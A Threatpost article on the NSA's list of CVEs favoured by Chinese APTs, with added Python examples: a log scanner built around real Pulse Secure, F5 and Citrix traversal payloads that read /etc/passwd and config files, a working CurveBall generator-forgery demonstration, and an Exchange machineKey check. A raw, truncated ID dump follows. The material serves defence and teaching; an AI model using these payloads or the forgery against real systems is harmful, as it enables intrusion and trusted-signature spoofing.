Chinese state-sponsored cyberattackers are actively compromising U.S. targets using a raft of known security vulnerabilities – with a Pulse VPN flaw claiming the dubious title of “most-favored bug” for these groups.
That’s according to the National Security Agency (NSA), which released a “top 25” list of the vulnerabilities most exploited by China-linked advanced persistent threats (APTs), a roster that includes the likes of [Cactus Pete](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>), [TA413](<https://threatpost.com/chinese-apt-sepulcher-malware-phishing-attacks/158871/>), [Vicious Panda](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>) and [Winnti](<https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/>).
The Feds [warned in September](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>) that Chinese threat actors had successfully compromised several government and private sector entities in recent months; the NSA is now driving the point home about the need to patch amid this flurry of heightened activity.
“Many of these vulnerabilities can be used to gain initial access to victim networks by exploiting products that are directly accessible from the internet,” warned the NSA, in its Tuesday [advisory](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2387347/nsa-warns-chinese-state-sponsored-malicious-cyber-actors-exploiting-25-cves/>). “Once a cyber-actor has established a presence on a network from one of these remote exploitation vulnerabilities, they can use other vulnerabilities to further exploit the network from the inside.”
APTs – Chinese and otherwise – have ramped up their cyberespionage efforts in the wake of the pandemic as well as in the lead-up to the U.S. elections next month. But Chloé Messdaghi, vice president of strategy at Point3 Security, noted that these vulnerabilities feed an ongoing swell of attacks rather than a new one.
“We definitely saw an increase in this situation last year and it’s ongoing,” she said. “They’re trying to collect intellectual property data. Chinese attackers could be nation-state, could be a company or group of companies, or just a group of threat actors or an individual trying to get proprietary information to utilize and build competitive companies…in other words, to steal and use for their own gain.”
## **Pulse Secure, BlueKeep, Zerologon and More**
Plenty of well-known and infamous bugs made the NSA’s Top 25 cut. For instance, a notorious Pulse Secure VPN bug (CVE-2019-11510) is the first flaw on the list.
It’s a pre-authentication [arbitrary file-read flaw](<https://www.tenable.com/blog/cve-2019-11510-critical-pulse-connect-secure-vulnerability-used-in-sodinokibi-ransomware>), a path traversal that lets a remote, unauthenticated attacker pull files off the appliance, including cached credentials and session data. In April of this year, the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) attackers were actively using the issue to steal credentials and infiltrate corporate networks, and that credentials taken before a device was patched remain valid until they are changed. And in fact, this is the bug at the heart of the [Travelex ransomware fiasco](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) that hit in January.
Pulse Secure issued a patch in April 2019, but many companies impacted by the flaw still haven’t applied it, CISA warned.
Another biggie for foreign adversaries is a critical flaw in F5 BIG-IP proxy/load-balancer devices ([CVE-2020-5902](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>)). This remote code-execution (RCE) bug is a path traversal in the Traffic Management User Interface (TMUI) used to configure the device; it lets an unauthenticated request reach management pages that should sit behind the login. Exploitation gives complete control of the host machine, enabling interception and redirection of web traffic, decryption of traffic destined for web servers, and use of the device as a hop-point into other areas of the network.
At the end of June, F5 issued urgent patches for the bug, which has a CVSS severity score of 10 out of 10 “due to its lack of complexity, ease of attack vector, and high impacts to confidentiality, integrity and availability,” researchers said at the time. Thousands of devices were shown to be vulnerable in a Shodan search in July.
The NSA also flagged several Citrix vulnerabilities as favorites of Chinese actors, including CVE-2019-19781, which was revealed last holiday season. The bug exists in Citrix Application Delivery Controller (ADC) and Gateway, purpose-built networking appliances meant to improve the performance and security of applications delivered over the web. It is a directory traversal that lets an unauthenticated attacker reach scripts intended only for authenticated VPN users, and an exploit can lead to RCE without credentials.
When it was originally disclosed in December, the vulnerability did not have a patch, and Citrix had to [scramble to push fixes out](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) – but not before public proof-of-concept (PoC) exploit code emerged, along with active exploitation and mass scanning for the vulnerable Citrix products.
Other Citrix bugs on the list are CVE-2020-8193, an authorization bypass, and CVE-2020-8195 and CVE-2020-8196, two information-disclosure flaws in the same products.
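The three appliance bugs above share a shape: a path-traversal sequence that walks from an unauthenticated URL prefix into a restricted one. The detection logic below is an added example, not code from the article or from any of the vendors. It canonicalises request paths the way a lenient appliance front end does (double percent-decoding, Tomcat-style `;` path parameters, `..` resolution) and flags the publicly documented exploit paths for CVE-2019-11510, CVE-2020-5902 and CVE-2019-19781 in Apache-format access-log lines. The log lines, client addresses and function names are constructed for the example.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed Apache combined-format log lines. The first three carry the
# publicly documented exploit paths for the Pulse Secure, F5 TMUI and Citrix
# ADC bugs; the rest are ordinary requests to the same URL prefixes.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Oct/2020:10:01:02 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 200 1421 "-" "curl/7.68.0"
203.0.113.8 - - [20/Oct/2020:10:02:11 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 2210 "-" "python-requests/2.24"
203.0.113.9 - - [20/Oct/2020:10:03:45 +0000] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 200 83 "-" "Mozilla/5.0"
198.51.100.4 - - [20/Oct/2020:10:04:00 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 6021 "-" "Mozilla/5.0"
198.51.100.5 - - [20/Oct/2020:10:04:30 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 3390 "-" "Mozilla/5.0"
198.51.100.6 - - [20/Oct/2020:10:05:10 +0000] "GET /vpn/index.html HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')
# Authenticated TMUI pages reached via the '..;' trick in public PoCs
F5_JSP_RE = re.compile(r"/(fileRead|fileSave|tmshCmd)\.jsp$")


def normalize_path(raw_path):
    """Canonicalise a URL path and report whether it tried to climb above root.

    - percent-decode twice so double-encoded dots (%252e) are seen as '.'
    - strip ';param' path parameters per segment, which is what turns the
      F5 payload's '..;' segment into a plain '..' at the back end
    - resolve '.' and '..'; a '..' with nothing left to pop sets escaped_root,
      which no legitimate request ever needs
    """
    path = unquote(unquote(raw_path))
    stack, escaped_root = [], False
    for segment in path.split("/"):
        segment = segment.split(";", 1)[0]
        if segment in ("", "."):
            continue
        if segment == "..":
            if stack:
                stack.pop()
            else:
                escaped_root = True
            continue
        stack.append(segment)
    return "/" + "/".join(stack), escaped_root


def classify_target(target):
    """Return the CVE ids whose documented exploit shape the request matches."""
    raw_path = urlsplit(target).path
    norm, escaped_root = normalize_path(raw_path)
    hits = []
    # Pulse Secure: pre-auth traversal out of /dana-na/ to read arbitrary files
    if raw_path.startswith("/dana-na/") and (
            escaped_root or "/dana/html5acc/guacamole/" in raw_path):
        hits.append("CVE-2019-11510")
    # F5 TMUI: '..;' lets an unauthenticated request slip past /tmui/login.jsp
    if "/tmui/" in raw_path and ("..;" in raw_path or F5_JSP_RE.search(norm)):
        hits.append("CVE-2020-5902")
    # Citrix ADC: traversal from the unauthenticated /vpn/ tree into /vpns/
    if raw_path.startswith("/vpn/") and norm.startswith("/vpns/"):
        hits.append("CVE-2019-19781")
    return hits


def scan_log(text):
    """Return (cve, client_ip, target) for every request matching an exploit shape."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client_ip = line.split(" ", 1)[0]
        for cve in classify_target(m.group("target")):
            findings.append((cve, client_ip, m.group("target")))
    return findings


if __name__ == "__main__":
    for cve, ip, target in scan_log(SAMPLE_LOG):
        print(f"{cve}  {ip}  {target}")
```

Run against the sample, the three exploit lines come back tagged with their CVE and the benign requests to the same prefixes do not. Matching on the canonicalised path rather than the literal exploit string is what makes encoded variants such as `/vpn/..%2fvpns/` fall into the same bucket.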
Meanwhile, Microsoft bugs are well-represented, including the [BlueKeep RCE bug](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) in Remote Desktop Services (RDP), which is still under active attack more than a year after it was disclosed and patched in May 2019. The bug, tracked as CVE-2019-0708, can be exploited by an unauthenticated attacker who connects to the target system over RDP and sends specially crafted requests to execute code. Because it needs no credentials and no user interaction, BlueKeep is wormable, and researchers warned at the time that it could lead to a WannaCry-level disaster.
Another bug-with-a-name on the list is [Zerologon](<https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/>) (CVE-2020-1472), the privilege-escalation vulnerability that allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. The flaw is in the Netlogon Remote Protocol’s use of AES-CFB8 with an all-zero initialization vector: an attacker can pass the client-credential check with an all-zero value after about 256 attempts on average, then reset the domain controller’s machine-account password. It was patched in August, but many organizations remain vulnerable, and the DHS recently [issued a dire warning](<https://threatpost.com/dire-patch-warning-zerologon/159404/>) on the bug amid a tsunami of attacks.
CVE-2020-0601, the first vulnerability for which the NSA publicly took credit for reporting to Microsoft, is also being favored by Chinese actors. This spoofing vulnerability, [patched in January](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>), exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates: the code matched a certificate to a trusted root by public key without checking that the certificate’s explicit curve parameters, in particular its generator, were the same as the root’s. An attacker can therefore craft a key pair with a custom generator that reproduces a trusted root’s public key, use it to sign a malicious executable under a spoofed code-signing certificate, and make the file appear to come from a trusted, legitimate source.
Two proof-of-concept (PoC) exploits were publicly released just a week after Microsoft’s January Patch Tuesday security bulletin addressed the flaw.
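What makes the CryptoAPI bug exploitable is that a certificate can carry explicit curve parameters, including its own generator. The following is an added worked example, not code from the article, from Microsoft or from the PoC authors: it implements P-256 arithmetic and ECDSA in plain Python, builds an attacker key pair whose public point equals a trusted root’s public key under an attacker-chosen generator, and shows that a signature made with that key verifies under the certificate’s own parameters, that a check comparing only the public key accepts the forged key, and that a check comparing the generator as well rejects it. The root key, the signed bytes and the function names are constructed for the example; the curve constants are the published NIST P-256 values.

```python
import hashlib
import secrets

# NIST P-256 domain parameters (public constants).
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)
INF = None  # point at infinity


def point_add(p1, p2):
    """Affine addition on y^2 = x^3 + A*x + B over GF(P); doubling included."""
    if p1 is INF:
        return p2
    if p2 is INF:
        return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2:
        if (y1 + y2) % P == 0:
            return INF
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)

def scalar_mult(k, point):
    """Double-and-add; k is reduced mod N since every point used has order N."""
    result, addend = INF, point
    k %= N
    while k:
        if k & 1:
            result = point_add(result, addend)
        addend = point_add(addend, addend)
        k >>= 1
    return result

def on_curve(point):
    x, y = point
    return (y * y - (x * x * x + A * x + B)) % P == 0

def ecdsa_sign(msg, priv, gen):
    z = int.from_bytes(hashlib.sha256(msg).digest(), "big") % N
    while True:
        k = 1 + secrets.randbelow(N - 1)
        r = scalar_mult(k, gen)[0] % N
        s = pow(k, -1, N) * (z + r * priv) % N
        if r and s:
            return (r, s)

def ecdsa_verify(msg, sig, pub, gen):
    """Verifier that, like CryptoAPI, uses the generator supplied with the key."""
    r, s = sig
    if not (0 < r < N and 0 < s < N):
        return False
    z = int.from_bytes(hashlib.sha256(msg).digest(), "big") % N
    w = pow(s, -1, N)
    pt = point_add(scalar_mult(z * w % N, gen), scalar_mult(r * w % N, pub))
    return pt is not INF and pt[0] % N == r

def make_root_ca():
    """Honest CA key pair on standard P-256, Q = d*G (constructed for the demo)."""
    d = 1 + secrets.randbelow(N - 1)
    return d, scalar_mult(d, G)

def forge_curveball_key(root_pub):
    """Attacker side: pick any d', set G' = d'^-1 * Q so that d' * G' == Q.
    Same P, A and B, different base point, which explicit EC parameters in a
    certificate can express."""
    d_fake = 1 + secrets.randbelow(N - 1)
    return d_fake, scalar_mult(pow(d_fake, -1, N), root_pub)

def vulnerable_is_trusted(cert_pub, trusted_pub):
    # Pre-patch effect: the trust decision rests on the public key alone.
    return cert_pub == trusted_pub

def fixed_is_trusted(cert_pub, cert_gen, trusted_pub):
    # Patched behaviour: the generator must match too (P, A, B are fixed here).
    return cert_pub == trusted_pub and cert_gen == G

def demo():
    _, q_root = make_root_ca()
    d_fake, g_fake = forge_curveball_key(q_root)
    blob = b"constructed stand-in for a signed executable"
    sig = ecdsa_sign(blob, d_fake, g_fake)
    return {
        "forged_generator_on_curve": on_curve(g_fake),
        "forged_key_reproduces_root": scalar_mult(d_fake, g_fake) == q_root,
        "signature_verifies_with_cert_params": ecdsa_verify(blob, sig, q_root, g_fake),
        "signature_verifies_with_standard_G": ecdsa_verify(blob, sig, q_root, G),
        "vulnerable_check_trusts": vulnerable_is_trusted(q_root, q_root),
        "fixed_check_trusts": fixed_is_trusted(q_root, g_fake, q_root),
    }
```

The forged generator is a valid point on P-256, so a naive parameter check that compares only p, a and b passes as well; the generator (and, in the real fix, the full parameter set) has to be part of the comparison, or explicit parameters have to be refused outright for keys that chain to a known root.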
Then there’s a high-profile Microsoft Exchange validation-key RCE bug ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)), which stems from the server failing to create unique keys at install time: every Exchange installation shipped with the same static validationKey and decryptionKey in the Exchange Control Panel (ECP) web.config. An attacker with any valid mailbox credentials can use the known key to forge a ViewState payload that the server deserializes, running code as SYSTEM.
It was fixed as part of Microsoft’s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates – and [admins in March were warned](<https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/>) that unpatched servers were being exploited in the wild by unnamed APT actors. But as of Sept. 30, at least 61 percent of Exchange 2010, 2013, 2016 and 2019 servers [were still vulnerable](<https://threatpost.com/microsoft-exchange-exploited-flaw/159669/>) to the flaw.
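Because the pre-patch keys were identical on every installation, a fleet check is straightforward: two Exchange servers whose ECP `web.config` (under `FrontEnd\HttpProxy\ecp\` in the Exchange install directory) carry the same `<machineKey>` are running the shipped default rather than install-unique keys. The script below is an added example, not the article’s or Microsoft’s code. The config fragments, host names and key values are constructed placeholders (not the real Exchange defaults), and `known_default` is a hypothetical parameter an operator fills with the published pre-patch pair when an exact match should be reported.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed placeholder key pairs; these are NOT the real Exchange defaults.
SHARED_KEY = ("00112233445566778899AABBCCDDEEFF0011223344556677",
              "0123456789ABCDEF0123456789ABCDEF")
UNIQUE_KEY = ("FFEEDDCCBBAA99887766554433221100FFEEDDCCBBAA9988",
              "FEDCBA9876543210FEDCBA9876543210")


def ecp_web_config(validation_key, decryption_key):
    """Constructed minimal ECP web.config with an explicit <machineKey>."""
    return f"""<configuration>
  <system.web>
    <machineKey validationKey="{validation_key}"
                decryptionKey="{decryption_key}"
                validation="SHA1" decryption="3DES" />
  </system.web>
</configuration>"""


# Three hypothetical servers: EX01 and EX02 still carry one identical
# hard-coded pair (the unpatched condition); EX03 has install-unique keys.
CONFIGS = {
    "EX01": ecp_web_config(*SHARED_KEY),
    "EX02": ecp_web_config(*SHARED_KEY),
    "EX03": ecp_web_config(*UNIQUE_KEY),
}


def extract_machine_key(xml_text):
    """Return the <machineKey> attributes from a web.config, or None if absent."""
    root = ET.fromstring(xml_text)
    node = next(root.iter("machineKey"), None)
    if node is None:
        return None
    return {name: node.get(name) for name in
            ("validationKey", "decryptionKey", "validation", "decryption")}


def assess(configs, known_default=None):
    """Map host -> findings. A key pair seen on more than one host, or equal
    to known_default (the published pre-patch pair, supplied by the operator),
    means the server never received install-unique keys. An explicit but
    unique pair is what a patched Exchange server is expected to have."""
    by_pair = defaultdict(list)
    for host, xml_text in configs.items():
        mk = extract_machine_key(xml_text)
        if mk is None or mk["validationKey"].startswith("AutoGenerate"):
            continue  # no explicit key, or ASP.NET generates one per machine
        by_pair[(mk["validationKey"], mk["decryptionKey"])].append(host)
    findings = {host: [] for host in configs}
    for pair, hosts in by_pair.items():
        for host in hosts:
            others = sorted(h for h in hosts if h != host)
            if others:
                findings[host].append("machineKey shared with " + ", ".join(others))
            if known_default is not None and pair == tuple(known_default):
                findings[host].append("machineKey matches known pre-patch default")
    return findings


if __name__ == "__main__":
    for host, notes in assess(CONFIGS).items():
        print(host, "OK" if not notes else "; ".join(notes))
```

Collect the ECP `web.config` from each server, feed them in as the `configs` mapping, and anything reported as shared (or as matching the supplied default) is a server the February update never reached or whose configuration was restored from a pre-patch copy.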
## **The Best of the Rest**
The NSA’s Top 25 list covers plenty of ground, including a [nearly ubiquitous NTLM tampering bug](<https://threatpost.com/critical-microsoft-rce-bugs-windows/145572/>) (CVE-2019-1040) that, when disclosed last year, affected all supported versions of Windows. It allows a man-in-the-middle attacker to strip the NTLM Message Integrity Check (MIC) from an authentication exchange, enabling relay attacks that can end in remote code execution on the host the authentication is relayed to.
Here’s a list of the other flaws:
* CVE-2018-4939, a deserialization RCE in certain Adobe ColdFusion versions.
* CVE-2020-2555, a deserialization RCE in the Oracle Coherence library in Oracle Fusion Middleware.
* CVE-2019-3396, a server-side template injection in the Widget Connector macro in Atlassian Confluence Server.
* CVE-2019-11580, an unauthenticated RCE via the pdkinstall development plugin in Atlassian Crowd and Crowd Data Center.
* CVE-2020-10189, a pre-authentication deserialization RCE in Zoho ManageEngine Desktop Central.
* CVE-2019-18935, a .NET deserialization RCE in Progress Telerik UI for ASP.NET AJAX.
* CVE-2019-0803, a privilege-escalation issue in the Windows Win32k component.
* CVE-2020-3118, a stack overflow in the Cisco Discovery Protocol implementation for Cisco IOS XR Software, exploitable by an attacker on the same Layer 2 segment.
* CVE-2020-8515, a pre-authentication command injection in DrayTek Vigor routers.
The advisory also covers three older bugs: a heap overflow in the base64 decoder of the Exim mail transfer agent (CVE-2018-6789); an RCE in Symantec Messaging Gateway (CVE-2017-6327); and a Java deserialization RCE in the WLS Security component of Oracle WebLogic Server (CVE-2015-4852).
“We hear loud and clear that it can be hard to prioritize patching and mitigation efforts,” NSA Cybersecurity Director Anne Neuberger said in a media statement. “We hope that by highlighting the vulnerabilities that China is actively using to compromise systems, cybersecurity professionals will gain actionable information to prioritize efforts and secure their systems.”
*Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks, by Tara Seals, Threatpost, Oct. 21, 2020: https://threatpost.com/bug-nsa-china-backed-cyberattacks/160421/*
"AC9BE6BA-8352-57D6-80E3-8BB62A0D31C2", "ACE1EC69-37E6-58A5-8C0B-96212CDB38DF", "AE03C974-B00F-5DF7-B2AF-77D6E46CD5FD", "AE9D3A7C-7BEB-54EA-9C61-A03C494D5EDD", "B042A63E-E661-5B8E-9AA1-F0DEE4C18402", "B3DCB90F-80B1-5462-AC61-AF04513F2F3A", "B3FAEE67-7743-52ED-89D0-D83BAEA1A38D", "B417316F-A794-5234-BC9E-475C438FC35C", "BA12D007-F6E5-5BB6-874F-789DCAE9524E", "BA9FEAFF-DC39-53B5-B03D-8A01486E0879", "BBEEB41B-D67F-54B6-BA27-1956F83AAAC5", "BC6A00C7-AE9A-533B-87DE-DD27240A818C", "BE2B1B45-11AE-56F2-A5B4-2497BAE3B016", "BE88205A-26D3-5EFE-B8CC-828EE7E33C86", "BE90B1DD-521D-540C-8554-5454779256A5", "BEDCA78A-B03B-5065-AB50-3AC902332B03", "BEF7E47B-985F-56DE-AD21-DFEF507AAFE1", "C3AF7933-1DDE-58AB-BF32-75FEDB10C925", "C467EA51-59B6-5BEB-A634-62EFC2DC4419", "C4A313B8-6946-51D9-A5C4-EF515BAC47C9", "C50B5DBC-9051-5380-B5B3-93A023128F22", "C641C472-7F12-5C7B-9934-BE59C8B1974B", "C790841B-11B6-5497-B6DB-EF8A56DD8A0C", "C82E0A5A-3070-5ED4-A0CF-B3E342C5E0C1", "C89AC173-55D4-50C8-A17E-42EB65710CCB", "C9FCD26D-4C04-5F36-8E61-05484E6979D6", "CA1AFE75-C90A-5C21-92B0-FC1C0282B767", "CA34E4C9-BC58-5284-81F7-EC6AC06EC7AF", "CA7DF0EF-7032-54E3-B16E-D0845CE73845", "CD0102AD-F33A-5068-9719-30CB0CB3C152", "CF1C1A91-4D20-553C-A027-71BE18F8BAA5", "CF9EC818-A904-586C-9C19-3B4F04770FBD", "D07D56B4-40BB-511F-B7EA-EF5B1544D876", "D166D6FD-186D-5EE5-951A-8AB30D45EA32", "D2A01405-1B4C-5B8D-85AC-D1E23D1F3B56", "D4308421-E113-5104-8D37-4FB75AE2D7DC", "D4572C36-FAE8-5802-9B48-CF143220B909", "D4DF3FFF-4FBA-5ADB-88FC-A7E1BED572B9", "D6710F36-D7F3-57EA-BD83-CED78FC054F6", "D7EF2A21-5BA9-5730-90E0-E085DDFD2801", "D8B68D98-BBF3-5A69-82DD-C0760C9923D4", "D8BEFAC3-BA4E-5E7E-8553-B512E126AD53", "DB6F697E-55A0-538F-A15B-E61B8B4E4D70", "DC044D23-6D59-5326-AB78-94633F024A74", "DC8A29A1-755A-50C2-9D9D-FF11FCB054F2", "DE558F67-26A7-5F03-AD15-C2087B81E69F", "DEF06C66-815B-54B3-A5CC-951F37453002", "DF00B503-1F21-5ABD-B713-1F79E4D1CB9A", "E22A392B-5D30-51F4-92ED-8E10BA7EE8D2", "E2C6B714-1F75-5584-B0B3-280C3B36C014", 
"E3BF7E8E-58EA-5BC5-A6F4-401912FFB4BE", "E3D6A7AD-AC9C-55EB-A993-B78D05403B54", "E46AAFC9-276F-5161-B013-393D9A538259", "E5B0F794-87CD-5152-9D64-3AB23AF5C3EF", "E72D9129-EEED-5E3C-9CD8-9BD6201170C0", "E7B26D35-BAFD-51CB-BFAC-CA7E5EA5FA9A", "E8AD52BD-4EE5-5E85-91FE-66A868E0162B", "EA2EA382-C5B7-54EF-8547-EDDD15EA1B85", "EAFD9DBC-1E36-570B-9F48-8C355BBFD8E6", "EBBEA4C3-D6F9-53AF-BBE9-D3438C945AB4", "EBF17036-7547-54B5-B0D6-B465FE6C9873", "EE2763B9-CDEA-5FAF-91CF-8B6902DD2E56", "EE4C8DE4-3366-58B0-9494-7FD5B6F9D0EF", "F1CA855B-967C-5A5E-9256-FDDE87702713", "F2165DE4-7724-559C-A733-DE9F244DA408", "F22160B4-2E80-5B7D-8238-95D7833F6D73", "F27B127B-57F0-5352-B92F-B6F921378CBB", "F3D87CA2-44D8-583C-AF7F-85AA53FB6CAD", "F5B92B0D-E802-5254-8668-D6A4B1DB8004", "F775D2F3-FF1F-529F-B0F3-99AB6A801264", "F922DD70-E22B-5EBE-9CAE-410224E95831", "F9EF1801-C66C-572B-B67A-9A67E04D6B06", "FBA74A16-061A-5741-B662-B77D2C6DF28F", "FBB9B577-00A5-5C82-AFC5-4A52422056F3", "FE544217-2BB0-5C05-B26C-D14EE378E8A5", "FFBF7B7B-FFD8-5A32-89B0-AAB175FD2AE6", "FFF6224F-273A-5CB1-9421-833769E01519"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:2E85097DC4FBE492B1CB6FAE84AFE126", "GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "hackerone", "idList": ["H1:1174185", "H1:1519841", "H1:322935", "H1:518637", "H1:536130", "H1:538771", "H1:541858", "H1:591295", "H1:617543", "H1:632721", "H1:671749", "H1:671857", "H1:678496", "H1:680480", "H1:695005", "H1:713900", "H1:838196", "H1:913695"]}, {"type": "hivepro", "idList": ["HIVEPRO:FD730BCAD086DD8C995242D13B38EBC8"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20190529-01-WINDOWS"]}, {"type": "ibm", "idList": ["44D4BE9C6B3A5CA2D7E393A0C6B1DE6752C9B6BDF8F6BC23CA690D4063D3152B", "9A19B1A61B0A4ADFDBA9E428552BF21656703586B14AC314FFC9B663C7D9BDEB", "B2EA2FBA4D280351FEA7F9EC1921C448D44F4D9EC613590A87A15467F7D34153", "DAB88099018B311F83DAFDB9431625A326A00FF72BE126856DCECA1262D7C308", 
"DB866DC8DC23646847AE5E9E25C02B2DF2A195A414B2734DCAA102E637957BAF", "DDAE44367545E909F1C5E82BA6B48DEA1D51F717CEAE6CED7805AFEA883D85F1"]}, {"type": "ics", "idList": ["AA19-168A", "AA20-010A", "AA20-014A", "AA20-020A", "AA20-031A", "AA20-099A", "AA20-107A", "AA20-126A", "AA20-133A", "AA20-206A", "AA20-258A", "AA20-259A", "AA20-275A", "AA20-283A", "AA20-296A", "AA20-296B", "AA21-110A", "AA21-116A", "AA21-200B", "AA21-209A", "AA22-011A", "AA22-047A", "AA22-055A", "AA22-117A", "AA22-158A", "AA22-279A", "AA23-074A", "ICSA-21-077-03", "ICSMA-20-049-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7", "IMPERVABLOG:6F67E97EF55C748CBFEE482E85D4751A", "IMPERVABLOG:A1972445B3E03EDA92E53FFFBD6771BD", "IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51", "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D"]}, {"type": "kaspersky", "idList": ["KLA11460", "KLA11493", "KLA11639", "KLA11647", "KLA11664", "KLA11706", "KLA11720", "KLA11874", "KLA11875"]}, {"type": "kitploit", "idList": ["KITPLOIT:102871766956097088", "KITPLOIT:1049860926455958760", "KITPLOIT:1207079539580982634", "KITPLOIT:1225614657733366094", "KITPLOIT:1494860154339275183", "KITPLOIT:1844185171331211854", "KITPLOIT:1986765330027575502", "KITPLOIT:2730308475904875028", "KITPLOIT:3080370456145673111", "KITPLOIT:3124960652240981745", "KITPLOIT:3245813529202482542", "KITPLOIT:3359946123198241398", "KITPLOIT:3397940664053959113", "KITPLOIT:3565898196234868215", "KITPLOIT:4019975092566820832", "KITPLOIT:4205221140433081492", "KITPLOIT:43221571859278589", "KITPLOIT:4421457840699592233", "KITPLOIT:4482238198881011483", "KITPLOIT:4707889613618662864", "KITPLOIT:5052987141331551837", "KITPLOIT:5420210148456420402", "KITPLOIT:5485948766090500662", "KITPLOIT:5528727998547000766", "KITPLOIT:5769166566971079899", "KITPLOIT:5896951739767119270", "KITPLOIT:6073614302403805969", "KITPLOIT:6082359615438809301", "KITPLOIT:6972580572774284552", 
"KITPLOIT:724832466163115459", "KITPLOIT:727243444931520192", "KITPLOIT:777119556142010019", "KITPLOIT:7915799087007906859", "KITPLOIT:8309365460568193500", "KITPLOIT:8418780960315245103", "KITPLOIT:998955151150716619"]}, {"type": "krebs", "idList": ["KREBS:58D4F859AA2566B4BCE221DB78B85548", "KREBS:62E2D32C0ABD1C4B8EA91C60B425255B", "KREBS:92A33A0E1BB183F4EF513731C0304581", "KREBS:95DEE0244F6DE332977BB606555E5A3C", "KREBS:9D9C58DB5C5495B10D2EBDB92549B0F2", "KREBS:C93CCA23099AC250E702848B49677D5B", "KREBS:DF8493DA16F49CE6247436830678BA8D", "KREBS:F9486A3FDB624FD485CEA4ECAFAF3CCA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:31DFC46E307127AF5C9FD13F15DF62DB", "MALWAREBYTES:5899EF0CF34937AFA2DB4AB02D282DF6", "MALWAREBYTES:5B32671B820EEB03840B798BCEA9FDC8", "MALWAREBYTES:60B52235DCBD12E98C7DB46F859F885C", "MALWAREBYTES:6ECB9DE9A2D8D714DB50F19BAF7BF3D4", "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "MALWAREBYTES:8B41C7471B07595F7246D3DCB8794894", "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "MALWAREBYTES:D7EFF87E8AB1DBEC63A0DBE7F8DA90B8"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-SCANNER-HTTP-CITRIX_DIR_TRAVERSAL-", "MSF:AUXILIARY-SCANNER-RDP-CVE_2019_0708_BLUEKEEP-", "MSF:EXPLOIT-FREEBSD-HTTP-CITRIX_DIR_TRAVERSAL_RCE-", "MSF:EXPLOIT-MULTI-HTTP-CONFLUENCE_WIDGET_CONNECTOR-", "MSF:EXPLOIT-MULTI-MISC-WEBLOGIC_DESERIALIZE_BADATTRVAL-", "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_ECP_VIEWSTATE-", "MSF:EXPLOIT-WINDOWS-HTTP-TELERIK_RAU_DESERIALIZATION-", "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2020_0787_BITS_ARBITRARY_FILE_MOVE-", "MSF:EXPLOIT-WINDOWS-RDP-CVE_2019_0708_BLUEKEEP_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:9AAC6D759E6AD62F92B56B228C39C263", "MMPC:CBEDB87F4D35A5FD3EE19BAA5965FC1B", "MMPC:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "mscve", "idList": 